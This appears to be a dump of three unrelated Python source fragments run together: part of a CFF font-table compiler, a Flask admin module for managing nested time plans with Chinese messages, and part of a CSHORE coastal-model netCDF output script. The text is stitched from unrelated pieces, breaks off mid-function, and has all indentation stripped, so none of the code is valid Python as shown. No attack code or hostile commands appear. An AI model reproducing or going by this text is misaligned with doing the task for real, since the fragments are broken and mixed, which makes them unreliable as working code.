operators = buildOperatorDict(topDictOperators)
class PrivateDictDecompiler(psCharStrings.DictDecompiler):
operators = buildOperatorDict(privateDictOperators)
class DictCompiler(object):
maxBlendStack = 0
def __init__(self, dictObj, strings, parent, isCFF2=None):
if strings:
assert isinstance(strings, IndexedStrings)
if isCFF2 is None and hasattr(parent, "isCFF2"):
isCFF2 = parent.isCFF2
assert isCFF2 is not None
self.isCFF2 = isCFF2
self.dictObj = dictObj
self.strings = strings
self.parent = parent
rawDict = {}
for name in dictObj.order:
value = getattr(dictObj, name, None)
if value is None:
continue
conv = dictObj.converters[name]
value = conv.write(dictObj, value)
if value == dictObj.defaults.get(name):
continue
rawDict[name] = value
self.rawDict = rawDict
def setPos(self, pos, endPos):
pass
def getDataLength(self):
return len(self.compile("getDataLength"))
def compile(self, reason):
log.log(DEBUG, "-- compiling %s for %s", self.__class__.__name__, reason)
rawDict = self.rawDict
data = []
for name in self.dictObj.order:
value = rawDict.get(name)
if value is None:
continue
op, argType = self.opcodes[name]
if isinstance(argType, tuple):
l = len(argType)
assert len(value) == l, "value doesn't match arg type"
for i in range(l):
arg = argType[i]
v = value[i]
arghandler = getattr(self, "arg_" + arg)
data.append(arghandler(v))
else:
arghandler = getattr(self, "arg_" + argType)
data.append(arghandler(value))
data.append(op)
data = bytesjoin(data)
return data
def toFile(self, file):
data = self.compile("toFile")
file.write(data)
def arg_number(self, num):
if isinstance(num, list):
data = [encodeNumber(val) for val in num]
data.append(encodeNumber(1))
data.append(bytechr(blendOp))
datum = bytesjoin(data)
else:
datum = encodeNumber(num)
return datum
def arg_SID(self, s):
return psCharStrings.encodeIntCFF(self.strings.getSID(s))
def arg_array(self, value):
data = []
for num in value:
data.append(self.arg_number(num))
return bytesjoin(data)
def arg_delta(self, value):
if not value:
return b""
val0 = value[0]
if isinstance(val0, list):
data = self.arg_delta_blend(value)
else:
out = []
last = 0
for v in value:
out.append(v - last)
last = v
data = []
for num in out:
data.append(encodeNumber(num))
return bytesjoin(data)
def arg_delta_blend(self, value):
"""A delta list with blend lists has to be *all* blend lists.
The value is a list arranged as follows::
[
[V0, d0..dn]
[V1, d0..dn]
...
[Vm, d0..dn]
]
``V`` is the absolute coordinate value from the default font, and
``d0..dn`` are the delta values from the *n* regions.
We want to return a list::
[
[v0, v1..vm]
[d0..dn]
...
[d0..dn]
numBlends
blendOp
]
where each ``v`` is relative to the previous default font value.
"""
numMasters = len(value[0])
numBlends = len(value)
numStack = (numBlends * numMasters) + 1
if numStack > self.maxBlendStack:
# Figure out the max number of value we can blend
# and divide this list up into chunks of that size.
numBlendValues = int((self.maxBlendStack - 1) / numMasters)
out = []
while True:
numVal = min(len(value), numBlendValues)
if numVal == 0:
break
valList = value[0:numVal]
out1 = self.arg_delta_blend(valList)
out.extend(out1)
value = value[numVal:]
else:
firstList = [0] * numBlends
deltaList = [None] * numBlends
i = 0
prevVal = 0
while i < numBlends:
# For PrivateDict BlueValues, the default font
# values are absolute, not relative.
# Must convert these back to relative coordinates
# before writing to CFF2.
defaultValue = value[i][0]
firstList[i] = defaultValue - prevVal
prevVal = defaultValue
deltaList[i] = value[i][1:]
i += 1
relValueList = firstList
for blendList in deltaList:
relValueList.extend(blendList)
out = [encodeNumber(val) for val in relValueList]
out.append(encodeNumber(numBlends))
out.append(bytechr(blendOp))
return out
def encodeNumber(num):
if isinstance(num, float):
return psCharStrings.encodeFloat(num)
else:
return psCharStrings.encodeIntCFF(num)
class TopDictCompiler(DictCompiler):
opcodes = buildOpcodeDict(topDictOperators)
def getChildren(self, strings):
isCFF2 = self.isCFF2
children = []
if self.dictObj.cff2GetGlyphOrder is None:
if hasattr(self.dictObj, "charset") and self.dictObj.charset:
if hasattr(self.dictObj, "ROS"): # aka isCID
charsetCode = None
else:
charsetCode = getStdCharSet(self.dictObj.charset)
if charsetCode is None:
children.append(CharsetCompiler(strings, self.dictObj.charset, self))
else:
self.rawDict["charset"] = charsetCode
if hasattr(self.dictObj, "Encoding") and self.dictObj.Encoding:
encoding = self.dictObj.Encoding
if not isinstance(encoding, str):
children.append(EncodingCompiler(strings, encoding, self))
else:
if hasattr(self.dictObj, "VarStore"):
varStoreData = self.dictObj.VarStore
varStoreComp = VarStoreCompiler(varStoreData, self)
children.append(varStoreComp)
if hasattr(self.dictObj, "FDSelect"):
# I have not yet supported merging a ttx CFF-CID font, as there are
# interesting issues about merging the FDArrays. Here I assume that
# either the font was read from XML, and the FDSelect indices are all
# in the charstring data, or the FDSelect array is already fully defined.
fdSelect = self.dictObj.FDSelect
# probably read in from XML; assume fdIndex in CharString data
if len(fdSelect) == 0:
charStrings = self.dictObj.CharStrings
for name in self.dictObj.charset:
fdSelect.append(charStrings[name].fdSelectIndex)
fdSelectComp = FDSelectCompiler(fdSelect, self)
children.append(fdSelectComp)
if hasattr(self.dictObj, "CharStrings"):
items = []
charStrings = self.dictObj.CharStrings
for name in self.dictObj.charset:
items.append(charStrings[name])
charStringsComp = CharStringsCompiler(
items, strings, self, isCFF2=isCFF2)
children.append(charStringsComp)
if hasattr(self.dictObj, "FDArray"):
# I have not yet supported merging a ttx CFF-CID font, as there are
# interesting issues about merging the FDArrays. Here I assume that the
# FDArray info is correct and complete.
fdArrayIndexComp = self.dictObj.FDArray.getCompiler(strings, self)
children.append(fdArrayIndexComp)
children.extend(fdArrayIndexComp.getChildren(strings))
if hasattr(self.dictObj, "Private"):
privComp = self.dictObj.Private.getCompiler(strings, self)
children.append(privComp)
children.extend(privComp.getChildren(strings))
return children
class FontDictCompiler(DictCompiler):
opcodes = buildOpcodeDict(topDictOperators)
def __init__(self, dictObj, strings, parent, isCFF2=None):
super(FontDictCompiler, self).__init__(dictObj, strings, parent, isCFF2=isCFF2)
#
# We now take some effort to detect if there were any key/value pairs
# supplied that were ignored in the FontDict context, and issue a warning
# for those cases.
#
ignoredNames = []
dictObj = self.dictObj
for name in sorted(set(dictObj.converters) - set(dictObj.order)):
if name in dictObj.rawDict:
# The font was directly read from binary. In this
# case, we want to report *all* "useless" key/value
# pairs that are in the font, not just the ones that
# are different from the default.
ignoredNames.append(name)
else:
# The font was probably read from a TTX file. We only
# warn about keys whose value is not the default. The
# ones that have the default value will not be written
# to binary anyway.
default = dictObj.defaults.get(name)
if default is not None:
conv = dictObj.converters[name]
default = conv.read(dictObj, default)
if getattr(dictObj, name, None) != default:
ignoredNames.append(name)
if ignoredNames:
log.warning(
"Some CFF FDArray/FontDict keys were ignored upon compile: " +
" ".join(sorted(ignoredNames)))
def getChildren(self, strings):
children = []
if hasattr(self.dictObj, "Private"):
privComp = self.dictObj.Private.getCompiler(strings, self)
children.append(privComp)
children.extend(privComp.getChildren(strings))
return children
class PrivateDictCompiler(DictCompiler):
maxBlendStack = maxStackLimit
opcodes = buildOpcodeDict(privateDictOperators)
def setPos(self, pos, endPos):
size = endPos - pos
self.parent.rawDict["Private"] = size, pos
self.pos = pos
def getChildren(self, strings):
children = []
if hasattr(self.dictObj, "Subrs"):
children.append(self.dictObj.Subrs.getCompiler(strings, self))
return children
class BaseDict(object):
def __init__(self, strings=None, file=None, offset=None, | |
# -*- coding: utf-8 -*-
# @Time : 2019-12-24
# @Author : mizxc
# @Email : <EMAIL>
import datetime
from flask import current_app, request, flash, render_template, redirect, url_for, jsonify
from flask_login import login_required, current_user
from . import bpAdmin
from project.common.dataPreprocess import strLength, strToDatetime, getPagingParameters
from project.model.timeManagement import *
@bpAdmin.route("/timeManagementTodayBoard")
@login_required
def timeManagementTodayBoard():
currentDate = str(datetime.datetime.now()).split(' ')[0]
dp = DailyPlan.objects(whichDay=currentDate).first()
return render_template('admin/timeManagementTodayBoard.html',dp=dp)
@bpAdmin.route("/timeManagementBoard/<planType>/<id>")
@login_required
def timeManagementBoard(planType,id):
if planType == 'yp':
p = YearlyPlan.objects(id=id).first()
sps = MonthlyPlan.objects(yearlyPlan=p).order_by('-id')
subPlanType = 'mp'
elif planType == 'mp':
p = MonthlyPlan.objects(id=id).first()
sps = WeeklyPlan.objects(monthlyPlan=p).order_by('-id')
subPlanType = 'wp'
elif planType == 'wp':
p = WeeklyPlan.objects(id=id).first()
sps = DailyPlan.objects(weeklyPlan=p).order_by('-id')
subPlanType = 'dp'
elif planType == 'dp':
p = DailyPlan.objects(id=id).first()
sps = []
subPlanType = ''
return render_template('admin/timeManagementBoard.html',
planType=planType,p=p,sps=sps,subPlanType=subPlanType)
@bpAdmin.route("/timeManagementWriteSummarize/<planType>/<id>",methods=['GET','POST'])
@login_required
def timeManagementWriteSummarize(planType,id):
if planType == 'yp':
p = YearlyPlan.objects(id=id).first()
elif planType == 'mp':
p = MonthlyPlan.objects(id=id).first()
elif planType == 'wp':
p = WeeklyPlan.objects(id=id).first()
elif planType == 'dp':
p = DailyPlan.objects(id=id).first()
if request.method == 'GET':
return render_template('admin/timeManagementWriteSummarize.html',
planType=planType,p=p)
if request.method == 'POST':
summarize = request.form['summarize']
if len(summarize)>15000:
return jsonify({'status': False, 'msg': u'请输入15000个字符内的总结!'})
p.summarize = summarize
p.save()
url = url_for('admin.timeManagementBoard',planType=planType,id=id)
return jsonify({'status': True, 'msg': u'总结提交成功!','url':url})
@bpAdmin.route("/timeManagementGetParentPlans",methods=['POST'])
@login_required
def timeManagementGetParentPlans():
id = request.form['id']
planType = request.form['planType']
p = None
if planType == 'yp':
p = YearlyPlan.objects(id=id).first()
elif planType == 'mp':
p = MonthlyPlan.objects(id=id).first()
elif planType == 'wp':
p = WeeklyPlan.objects(id=id).first()
html = ''
if p:
for item in p.plans:
if item.isDone:
done = '<i class="mdi mdi-check"></i>'
else:
done = ''
if item.level == 'L1':
html += '<li><label class="alert alert-danger">紧急重要:%s %s</label></li>' % (item.title,done)
elif item.level == 'L2':
html += '<li><label class="alert alert-warning">紧急不重要:%s %s</label></li>' % (item.title,done)
elif item.level == 'L3':
html += '<li><label class="alert alert-info">重要不紧急:%s %s</label></li>' % (item.title,done)
elif item.level == 'L4':
html += '<li><label class="alert alert-success">不重要不紧急:%s %s</label></li>' % (item.title,done)
return jsonify({'status': True, 'data': {'parentPlanTitle':p.title,'parentPlanJobs':html}})
else:
return jsonify({'status': False})
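The HTML built above maps each plan level to a Bootstrap alert class. A hypothetical sketch of that mapping as a lookup table (the English labels are illustrative translations of the original Chinese UI strings):

```python
LEVEL_STYLES = {
    'L1': ('alert-danger', 'urgent & important'),
    'L2': ('alert-warning', 'urgent, not important'),
    'L3': ('alert-info', 'important, not urgent'),
    'L4': ('alert-success', 'neither urgent nor important'),
}

def plan_item_html(level, title, done):
    """Render one plan item as a Bootstrap-styled list entry."""
    css, label = LEVEL_STYLES[level]
    check = '<i class="mdi mdi-check"></i>' if done else ''
    return '<li><label class="alert %s">%s: %s %s</label></li>' % (css, label, title, check)
```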
@bpAdmin.route("/timeManagementPlanDone",methods=['POST'])
@login_required
def timeManagementPlanDone():
try:
id = request.form['id']
planType = request.form['planType']
number = int(request.form['number'])
# Map the plan-type code to its model class so the toggle/recount
# logic is written once instead of once per plan type.
planClasses = {'yp': YearlyPlan, 'mp': MonthlyPlan, 'wp': WeeklyPlan, 'dp': DailyPlan}
p = planClasses[planType].objects(id=id).first()
# Toggle the selected item's done flag, then recount completed items.
p.plans[number].isDone = not p.plans[number].isDone
p.doneCount = sum(1 for i in p.plans if i.isDone)
p.save()
return jsonify({'status': True, 'info': u'提交任务成功!'})
except:
return jsonify({'status':False,'info':u'提交任务失败!'})
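The toggle-and-recount pattern used by `timeManagementPlanDone` can be modelled in isolation; `plans` below is a hypothetical stand-in for a plan document's embedded sub-plan list, not the MongoEngine model itself:

```python
# Hypothetical stand-in for a plan document's embedded list of sub-plans.
plans = [{"isDone": False}, {"isDone": True}, {"isDone": True}]

def toggle_plan(plans, number):
    # Flip the done flag of one sub-plan, then recompute the cached done count.
    plans[number]["isDone"] = not plans[number]["isDone"]
    return sum(1 for p in plans if p["isDone"])

doneCount = toggle_plan(plans, 0)
print(doneCount)  # → 3
```

Recomputing `doneCount` from scratch after every toggle keeps the cached counter consistent even if individual flags were edited elsewhere.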
# Yearly plans ____________________________________________________________________________________________
@bpAdmin.route("/timeManagementYearlyPlan")
@login_required
def timeManagementYearlyPlan():
levels = current_app.config['PLAN_LEVEL']
yps = YearlyPlan.objects.order_by('-id')
return render_template('admin/timeManagementYearlyPlan.html',
levels=levels,yps=yps)
@bpAdmin.route("/timeManagementYearlyPlanAdd",methods=['POST'])
@login_required
def timeManagementYearlyPlanAdd():
title = request.form['title']
startTime = request.form['startTime']
endTime = request.form['endTime']
planLevel = request.form.getlist('planLevel[]')
planTitle = request.form.getlist('planTitle[]')
if not strLength(title,1,100):
return jsonify({'status': False, 'info': u'请输入1-100个字符的年计划标题'})
if not startTime or not endTime:
return jsonify({'status': False, 'info': u'请选择时间范围'})
startTime = strToDatetime('%s 00:00:00' % startTime)
endTime = strToDatetime('%s 23:59:59' % endTime)
if endTime <= startTime:
return jsonify({'status': False, 'info': u'结束时间必须要晚于开始时间'})
# Check that this yearly plan's time range does not conflict with existing yearly plans
yps = YearlyPlan.objects
for i in yps:
if not (startTime>i.endTime or endTime<i.startTime):
return jsonify({'status': False, 'info': u'年计划时间范围(%s - %s)与其他年计划时间(%s - %s)冲突!' %
(startTime,endTime,i.startTime,i.endTime)})
plans = []
for index, t in enumerate(planTitle):
if len(t) > 0:
p = Plan()
p.title = t
p.level = planLevel[index]
plans.append(p)
yearlyPlan = YearlyPlan()
yearlyPlan.title = title
yearlyPlan.startTime = startTime
yearlyPlan.endTime = endTime
yearlyPlan.plans = plans
yearlyPlan.save()
return jsonify({'status': True, 'info': u'年计划添加成功'})
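The conflict check above is the standard interval-overlap test: two ranges overlap unless one ends before the other starts. A minimal sketch (note the route's actual comparison is inclusive at the endpoints, but since ranges run 00:00:00–23:59:59 they never exactly touch):

```python
from datetime import datetime

def overlaps(start_a, end_a, start_b, end_b):
    # Two closed intervals overlap unless one ends before the other starts.
    return not (start_a > end_b or end_a < start_b)

# Ranges sharing time conflict; back-to-back years do not.
print(overlaps(datetime(2020, 1, 1), datetime(2020, 12, 31),
               datetime(2021, 1, 1), datetime(2021, 12, 31)))  # → False
```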
@bpAdmin.route("/timeManagementYearlyPlanEdit/<id>",methods=['GET','POST'])
@login_required
def timeManagementYearlyPlanEdit(id):
yearlyPlan = YearlyPlan.objects(id=id).first()
levels = current_app.config['PLAN_LEVEL']
if request.method == 'GET':
return render_template('admin/timeManagementYearlyPlanEdit.html',
levels=levels, yearlyPlan=yearlyPlan,
startTime=str(yearlyPlan.startTime).split(' ')[0],
endTime=str(yearlyPlan.endTime).split(' ')[0])
if request.method == 'POST':
title = request.form['title']
startTime = request.form['startTime']
endTime = request.form['endTime']
planLevel = request.form.getlist('planLevel[]')
planTitle = request.form.getlist('planTitle[]')
isDone = request.form.getlist('isDone[]')
if not strLength(title,1,100):
return jsonify({'status': False, 'info': u'请输入1-100个字符的年计划标题'})
if not startTime or not endTime:
return jsonify({'status': False, 'info': u'请选择时间范围'})
startTime = strToDatetime('%s 00:00:00' % startTime)
endTime = strToDatetime('%s 23:59:59' % endTime)
if endTime <= startTime:
return jsonify({'status': False, 'info': u'结束时间要晚于开始时间'})
# Check that this yearly plan's time range does not conflict with other yearly plans
yps = YearlyPlan.objects
for i in yps:
if i == yearlyPlan: continue
if not (startTime > i.endTime or endTime < i.startTime):
return jsonify({'status': False, 'info': u'年计划时间范围(%s - %s)与其他年计划时间(%s - %s)冲突!' %
(startTime, endTime, i.startTime, i.endTime)})
plans = []
for index, t in enumerate(planTitle):
if len(t)>0:
p = Plan()
p.title = t
p.level = planLevel[index]
if isDone[index] == 'y':
p.isDone = True
else:
p.isDone = False
plans.append(p)
yearlyPlan.title = title
yearlyPlan.startTime = startTime
yearlyPlan.endTime = endTime
yearlyPlan.plans = plans
yearlyPlan.save()
return jsonify({'status': True, 'info': u'年计划修改成功'})
@bpAdmin.route("/timeManagementYearlyPlanDelete/<id>",methods=['GET'])
@login_required
def timeManagementYearlyPlanDelete(id):
# A plan with child plans cannot be deleted
p = YearlyPlan.objects(id=id).first()
if len(MonthlyPlan.objects(yearlyPlan=p))>0:
flash(u'该年计划有下属月计划,不能删除,请先删除下属月计划后,再删除年计划')
else:
p.delete()
flash(u'年计划删除成功')
return redirect(url_for('admin.timeManagementYearlyPlan'))
# Yearly plans ____________________________________________________________________________________________
# Monthly plans ____________________________________________________________________________________________
@bpAdmin.route("/timeManagementMonthlyPlan")
@login_required
def timeManagementMonthlyPlan():
levels = current_app.config['PLAN_LEVEL']
mps = MonthlyPlan.objects.order_by('-id')
yps = YearlyPlan.objects.order_by('-id')
return render_template('admin/timeManagementMonthlyPlan.html',
levels=levels,mps=mps,yps=yps)
@bpAdmin.route("/timeManagementMonthlyPlanAdd",methods=['POST'])
@login_required
def timeManagementMonthlyPlanAdd():
title = request.form['title']
yearlyPlanId = request.form['yearlyPlanId']
startTime = request.form['startTime']
endTime = request.form['endTime']
planLevel = request.form.getlist('planLevel[]')
planTitle = request.form.getlist('planTitle[]')
if not strLength(title,1,100):
return jsonify({'status': False, 'info': u'请输入1-100个字符的月计划标题!'})
if not startTime or not endTime:
return jsonify({'status': False, 'info': u'请选择时间范围'})
startTime = strToDatetime('%s 00:00:00' % startTime)
endTime = strToDatetime('%s 23:59:59' % endTime)
if endTime <= startTime:
return jsonify({'status': False, 'info': u'结束时间必须要晚于开始时间'})
y = YearlyPlan.objects(id=yearlyPlanId).first()
# Time range validation:
# the monthly plan's time range must fall within the yearly plan's range
if not (startTime>=y.startTime and endTime<=y.endTime):
return jsonify({'status': False, 'info': u'月计划的时间范围必须在年计划的时间范围内'})
# Monthly plans under the same yearly plan must not overlap
mps = MonthlyPlan.objects(yearlyPlan=y)
for i in mps:
if not (startTime >= i.endTime or endTime <= i.startTime):
return jsonify({'status': False, 'info': u'月计划的时间范围(%s - %s)和“%s”的时间范围(%s - %s)冲突' %
(startTime,endTime,i.title,i.startTime,i.endTime)})
plans = []
for index, t in enumerate(planTitle):
if len(t) > 0:
p = Plan()
p.title = t
p.level = planLevel[index]
plans.append(p)
m = MonthlyPlan()
m.title = title
m.startTime = startTime
m.endTime = endTime
m.plans = plans
m.yearlyPlan = y
m.save()
return jsonify({'status': True, 'info': u'月计划添加成功'})
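Alongside the overlap check, each child plan must be contained in its parent's range (month within year, week within month). The containment test reduces to two comparisons:

```python
def contained(child_start, child_end, parent_start, parent_end):
    # A child plan's range must lie entirely within its parent's range.
    return child_start >= parent_start and child_end <= parent_end

# Works for any orderable values; the routes use datetime objects.
print(contained(5, 10, 1, 12))  # → True
print(contained(0, 10, 1, 12))  # → False
```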
@bpAdmin.route("/timeManagementMonthlyPlanEdit/<id>",methods=['GET','POST'])
@login_required
def timeManagementMonthlyPlanEdit(id):
m = MonthlyPlan.objects(id=id).first()
if request.method == 'GET':
levels = current_app.config['PLAN_LEVEL']
yps = YearlyPlan.objects.order_by('-id')
return render_template('admin/timeManagementMonthlyPlanEdit.html',
levels=levels, m=m, yps=yps,
startTime=str(m.startTime).split(' ')[0],
endTime=str(m.endTime).split(' ')[0])
if request.method == 'POST':
title = request.form['title']
yearlyPlanId = request.form['yearlyPlanId']
startTime = request.form['startTime']
endTime = request.form['endTime']
planLevel = request.form.getlist('planLevel[]')
planTitle = request.form.getlist('planTitle[]')
isDone = request.form.getlist('isDone[]')
if not strLength(title, 1, 100):
return jsonify({'status': False, 'info': u'请输入1-100个字符的月计划标题!'})
if not startTime or not endTime:
return jsonify({'status': False, 'info': u'请选择时间范围!'})
startTime = strToDatetime('%s 00:00:00' % startTime)
endTime = strToDatetime('%s 23:59:59' % endTime)
if endTime <= startTime:
return jsonify({'status': False, 'info': u'结束时间必须要晚于开始时间!'})
y = YearlyPlan.objects(id=yearlyPlanId).first()
# Time range validation:
# the monthly plan's time range must fall within the yearly plan's range
if not (startTime >= y.startTime and endTime <= y.endTime):
return jsonify({'status': False, 'info': u'月计划的时间范围必须在年计划的时间范围内!'})
# Monthly plans under the same yearly plan must not overlap
mps = MonthlyPlan.objects(yearlyPlan=y)
for i in mps:
if i==m:continue
if not (startTime >= i.endTime or endTime <= i.startTime):
return jsonify({'status': False, 'info':u'月计划的时间范围(%s - %s)和“%s”的时间范围(%s - %s)冲突' %
(startTime, endTime, i.title, i.startTime, i.endTime)})
plans = []
for index, t in enumerate(planTitle):
if len(t) > 0:
p = Plan()
p.title = t
p.level = planLevel[index]
if isDone[index] == 'y':
p.isDone = True
else:
p.isDone = False
plans.append(p)
m.title = title
m.startTime = startTime
m.endTime = endTime
m.plans = plans
m.yearlyPlan = y
m.save()
return jsonify({'status': True, 'info': u'月计划修改成功!'})
@bpAdmin.route("/timeManagementMonthlyPlanDelete/<id>",methods=['GET'])
@login_required
def timeManagementMonthlyPlanDelete(id):
# A plan with child plans cannot be deleted
p = MonthlyPlan.objects(id=id).first()
if len(WeeklyPlan.objects(monthlyPlan=p)) > 0:
flash(u'该月计划有下属周计划,不能删除,请先删除下属周计划后,再删除月计划')
else:
p.delete()
flash(u'月计划删除成功')
return redirect(url_for('admin.timeManagementMonthlyPlan'))
# Monthly plans ____________________________________________________________________________________________
# Weekly plans ____________________________________________________________________________________________
@bpAdmin.route("/timeManagementWeeklyPlan")
@login_required
def timeManagementWeeklyPlan():
levels = current_app.config['PLAN_LEVEL']
wps = WeeklyPlan.objects.order_by('-id')
# Show only the 12 most recent monthly plans
mps = MonthlyPlan.objects.order_by('-id')[:12]
return render_template('admin/timeManagementWeeklyPlan.html',
levels=levels,mps=mps,wps=wps)
@bpAdmin.route("/timeManagementWeeklyPlanAdd",methods=['POST'])
@login_required
def timeManagementWeeklyPlanAdd():
title = request.form['title']
monthlyPlanId = request.form['monthlyPlanId']
startTime = request.form['startTime']
endTime = request.form['endTime']
planLevel = request.form.getlist('planLevel[]')
planTitle = request.form.getlist('planTitle[]')
if not strLength(title,1,100):
return jsonify({'status': False, 'info': u'请输入1-100个字符的周计划标题!'})
if not startTime or not endTime:
return jsonify({'status': False, 'info': u'请选择时间范围!'})
startTime = strToDatetime('%s 00:00:00' % startTime)
endTime = strToDatetime('%s 23:59:59' % endTime)
if endTime <= startTime:
return jsonify({'status': False, 'info': u'结束时间必须要晚于开始时间!'})
m = MonthlyPlan.objects(id=monthlyPlanId).first()
# Time range validation:
# the weekly plan's time range must fall within the monthly plan's range
if not (startTime>=m.startTime and endTime<=m.endTime):
return jsonify({'status': False, 'info': u'周计划的时间范围必须在月计划的时间范围内!'})
# Weekly plans under the same monthly plan must not overlap
wps = WeeklyPlan.objects(monthlyPlan=m)
for i in wps:
if not (startTime >= i.endTime or endTime <= i.startTime):
return jsonify({'status': False, 'info': u'周计划的时间范围(%s - %s)和“%s”的时间范围(%s - %s)冲突' %
(startTime,endTime,i.title,i.startTime,i.endTime)})
plans = []
for index, t in enumerate(planTitle):
if len(t) > 0:
p = Plan()
p.title = t
p.level = planLevel[index]
plans.append(p)
w = WeeklyPlan()
w.title = title
w.startTime = startTime
w.endTime = endTime
w.plans = plans
w.monthlyPlan = m
w.save()
return jsonify({'status': True, 'info': u'周计划添加成功!'})
@bpAdmin.route("/timeManagementWeeklyPlanEdit/<id>",methods=['GET','POST'])
@login_required
def | |
# go up one directory level
yaml_dir = os.path.dirname(yaml_dir)
if 'MOBILE' in version_prefix:
globalYaml = os.path.join(yaml_dir, 'yaml_files/CSHORE/CSHORE_mobile_global.yml')
varYaml = os.path.join(yaml_dir, 'yaml_files/CSHORE/CSHORE_mobile_var.yml')
elif 'FIXED' in version_prefix:
globalYaml = os.path.join(yaml_dir, 'yaml_files/CSHORE/CSHORE_fixed_global.yml')
varYaml = os.path.join(yaml_dir, 'yaml_files/CSHORE/CSHORE_fixed_var.yml')
else:
raise NotImplementedError('please check version prefix')
assert globalYaml is not None, 'CSHORE_analysis Error: Version prefix not recognized'
NCpath = makeNCdir(netCDFdir, version_prefix, date_str, model='CSHORE')
# build the name of this nc file from the version prefix and date
NCname = 'CMTB-morphModels_CSHORE_%s_%s.nc' %(version_prefix, date_str)
makenc.makenc_CSHORErun(os.path.join(NCpath, NCname), nc_dict, globalYaml, varYaml)
t = 1
def makeCSHORE_ncdict(startTime,inputDict):
"""
Args:
startTime (str): this is the time that all the CSHORE runs are tagged by (e.g., '2012-12-31T00:30:30Z')
inputDict (dict): keys are
version_prefix - currently MOBILE, MOBILE_RESET, or FIXED
workingDir - path to the working directory the user wants
Returns:
nc_dict (dict): the dictionary with keys that you hand to the nc file
(the data has been rotated back to the standard FRF conventions)
"""
version_prefix = inputDict['version_prefix']
workingDir = inputDict['workingDirectory']
model = 'CSHORE'
# initialize the class
cshore_io = inputOutput.cshoreIO()
# get into the directory I need
start_dir = workingDir
path_prefix = "%s/" % version_prefix # data super directory
d_s = DT.datetime.strptime(startTime, '%Y-%m-%dT%H:%M:%SZ')
date_str = d_s.strftime('%Y-%m-%dT%H%M%SZ') # drop the colons that appear in startTime so the string is filesystem-safe
params, bc, veg, hydro, sed, morpho, meta = cshore_io.load_CSHORE_results(os.path.join(start_dir, model, path_prefix, date_str))
# params - metadata about the run
# bc - boundary condition data, but for some reason it does not include the initial conditions?
# veg - vegetation information
# hydro - current and wave information
# sed - sediment information
# morpho - bed elevation information
# build the dictionary that is handed to the nc writer
nc_dict = {}
dim_t = len(hydro['umean'])
dim_x = len(hydro['umean'][0])
step = hydro['time_end'][1] - hydro['time_end'][0]
pierang = 71.8
# build the time vector
times = np.array([d_s + DT.timedelta(seconds=s) for s in np.ravel(hydro['time_end'] + step)])
# offsetting by the full step stamps the end of each interval; a half-step offset would instead center each timestamp between start and end
timeunits = 'seconds since 1970-01-01 00:00:00'
nc_dict['time'] = nc.date2num(times, timeunits)
# cross-shore X (and Y) in FRF coordinates
nc_dict['xFRF'] = meta["BC_FRF_X"] - morpho['x'][0]
nc_dict['yFRF'] = meta["BC_FRF_Y"]
# get my stuff that needs to be rotated
test_fun = lambda x: vectorRotation(x, theta=pierang + (90 - pierang) + pierang)
nc_dict['aveE'] = np.zeros([dim_t, dim_x])
nc_dict['aveN'] = np.zeros([dim_t, dim_x])
nc_dict['stdE'] = np.zeros([dim_t, dim_x])
nc_dict['stdN'] = np.zeros([dim_t, dim_x])
nc_dict['waveMeanDirection'] = np.zeros([dim_t, dim_x]) + np.nan
nc_dict['qbx'] = np.zeros([dim_t, dim_x])
nc_dict['qby'] = np.zeros([dim_t, dim_x])
nc_dict['qsx'] = np.zeros([dim_t, dim_x])
nc_dict['qsy'] = np.zeros([dim_t, dim_x])
for ii in range(0, len(hydro['umean'])):
# current stuff
newV = [test_fun(x) for x in zip(hydro['umean'][ii][:], hydro['vmean'][ii][:])]
nc_dict['aveE'][ii] = zip(*newV)[0]
nc_dict['aveN'][ii] = zip(*newV)[1]
newStd = [test_fun(x) for x in zip(hydro['ustd'][ii][:], hydro['vstd'][ii][:])]
nc_dict['stdE'][ii] = zip(*newStd)[0]
nc_dict['stdN'][ii] = zip(*newStd)[1]
# wave angle
t1 = 360 / float(2 * np.pi) * hydro['stheta'][ii]
t1[~np.isnan(t1)] = STWangle2geo(t1[~np.isnan(t1)], pierang=pierang)
nc_dict['waveMeanDirection'][ii] = t1
# sediment transport rate
new_qb = [test_fun(x) for x in zip(sed['qbx'][ii][:], sed['qby'][ii][:])]
nc_dict['qbx'][ii] = zip(*new_qb)[0]
nc_dict['qby'][ii] = zip(*new_qb)[1]
new_qs = [test_fun(x) for x in zip(sed['qsx'][ii][:], sed['qsy'][ii][:])]
nc_dict['qsx'][ii] = zip(*new_qs)[0]
nc_dict['qsy'][ii] = zip(*new_qs)[1]
# wave and water-level output
nc_dict['waveHs'] = hydro['Hs']
nc_dict['waterLevel'] = hydro['mwl']
nc_dict['stdWaterLevel'] = hydro['sigma']
nc_dict['setup'] = hydro['mwl'] - hydro['swl']
# runup output
nc_dict['runup2perc'] = hydro['runup_2_percent']
nc_dict['runupMean'] = hydro['runup_mean']
# other sediment stuff
nc_dict['probabilitySuspension'] = sed['ps']
nc_dict['probabilityMovement'] = sed['pb']
nc_dict['suspendedSedVolume'] = sed['vs']
# bathymetry
nc_dict['bottomElevation'] = morpho['zb'] # fixed vs. mobile runs may need different handling here:
# if a fixed bed copies the same bathymetry to every time step, keep only the first one
nc_dict['surveyNumber'] = np.zeros([dim_t]) + meta['bathy_surv_num']
nc_dict['profileNumber'] = np.zeros([dim_t]) + meta['bathy_prof_num']
nc_dict['bathymetryDate'] = nc.date2num(np.array([meta['bathy_surv_stime'] + DT.timedelta(hours=0) for i in xrange(dim_t)]), timeunits)
return nc_dict
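`vectorRotation` is not defined in this fragment; it is assumed to rotate a 2D (u, v) pair by `theta` degrees into FRF east/north components (note `pierang + (90 - pierang) + pierang` simplifies to `90 + pierang`). A minimal rotation-matrix sketch under that assumption, with `rotate2d` as a hypothetical stand-in:

```python
import numpy as np

def rotate2d(vec, theta_deg):
    # Counter-clockwise rotation of a 2D vector by theta degrees.
    t = np.deg2rad(theta_deg)
    rot = np.array([[np.cos(t), -np.sin(t)],
                    [np.sin(t),  np.cos(t)]])
    return rot @ np.asarray(vec, dtype=float)

# A unit vector along +x rotated 90 degrees lands on +y.
east, north = rotate2d((1.0, 0.0), 90.0)
print(round(east, 6), round(north, 6))  # → 0.0 1.0
```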
def CSHOREsimSetup(startTime, inputDict):
"""Author: <NAME>, Master of the Universe
Association: USACE CHL Field Research Facility
Project: Coastal Model Test Bed
This Function is the master call for the data preperation for the Coastal Model
Test Bed (CMTB). It is designed to pull from GetData and utilize
prep_datalib for development of the FRF CMTB
NOTE: input to the function is the end of the duration. All Files are labeled by this convention
all time stamps otherwise are top of the data collection
Args:
startTime (str): this is the start time for the simulation (string in format e.g., '2016-06-02T10:00:00Z' )
